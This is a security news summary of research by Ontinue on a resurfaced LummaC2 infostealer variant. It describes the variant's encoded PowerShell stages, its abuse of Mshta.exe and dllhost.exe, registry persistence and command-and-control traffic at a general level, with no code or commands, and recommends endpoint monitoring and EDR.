Summary: LummaC2, an infostealer malware, has re-emerged with advanced tactics to infiltrate systems and exfiltrate sensitive data using obfuscated PowerShell commands. This malware, initially identified in 2022, poses significant risks through its sophisticated methods and reliance on legitimate Windows binaries for execution.
Threat Actor: LummaC2 Operators | LummaC2 Operators
Victim: Various Organizations | Various Organizations
Key Point :
- Stages of infection involve encoded PowerShell commands that download and execute additional malicious scripts, often disguised as legitimate files.
- LummaC2 utilizes LOLbins like Mshta.exe for stealthy initial payload execution, leveraging trusted Windows binaries.
- The malware ensures persistence by modifying registry locations, allowing it to start automatically with the system.
- Communication with the command-and-control server is conducted via POST requests, using dllhost.exe to exfiltrate data and receive instructions.
LummaC2, an infostealer malware actively exploiting PowerShell commands, has resurfaced to infiltrate and exfiltrate sensitive data.
Discovered by cybersecurity researchers at Ontinue, the malware’s latest variant demonstrates sophisticated tactics that pose significant risks to targeted systems.
LummaC2, initially identified in Russian-speaking forums in 2022, is a toolwritten in C and distributed as Malware-as-a-Service (MaaS). It is designed to steal sensitive information from infected endpoints, including credentials and personal data.
The new report, published today, details how LummaC2’s initial attack vector involves obfuscated PowerShell commands that download and execute payloads, often using Microsoft’s legitimate LOLbins (Living-off-the-Land binaries) such as Mshta.exe and Dllhost.exe for malicious purposes.
New LummaC2 Variant: Key Findings
-
Stages of infection: The malware operates in multiple stages, starting with an encoded PowerShell command that downloads additional malicious scripts and files. These scripts are then decrypted and executed on the target device, often masquerading as legitimate files to evade detection
-
Use of LOLbins: LummaC2 leverages Mshta.exe to run HTML application files for its initial payload execution. This allows the malware to remain stealthy by utilizing trusted Windows binaries
-
Persistence techniques: The malware achieves persistence by writing to common registry locations that ensure it starts automatically with the system, allowing continuous access to compromised devices
-
Command-and-control (C2): The malware communicates with its C2 server via POST requests, exfiltrating stolen data and receiving instructions. The process “dllhost.exe” is exploited for this communication, allowing attackers to manipulate the compromised system remotely
Read more on LummaC2-enabled attacks: Famous YouTube Channels Hacked to Distribute Infostealers
The implications of these findings are concerning. As Ontinue analysis shows, LummaC2’s techniques align with various MITRE ATT&CK frameworks, such as Process Injection (T1055) and Persistence via Registry Modification (T1547.001).
The firm emphasized the need for enhanced endpoint monitoring and implementation of security measures like attack surface reduction (ASR) rules to counteract these sophisticated threats.
Organizations are also advised to deploy endpoint detection and response (EDR) solutions and monitor unusual behavior, particularly those involving trusted processes like dllhost.exe.
Source: https://www.infosecurity-magazine.com/news/lummac2-infostealer-obfuscated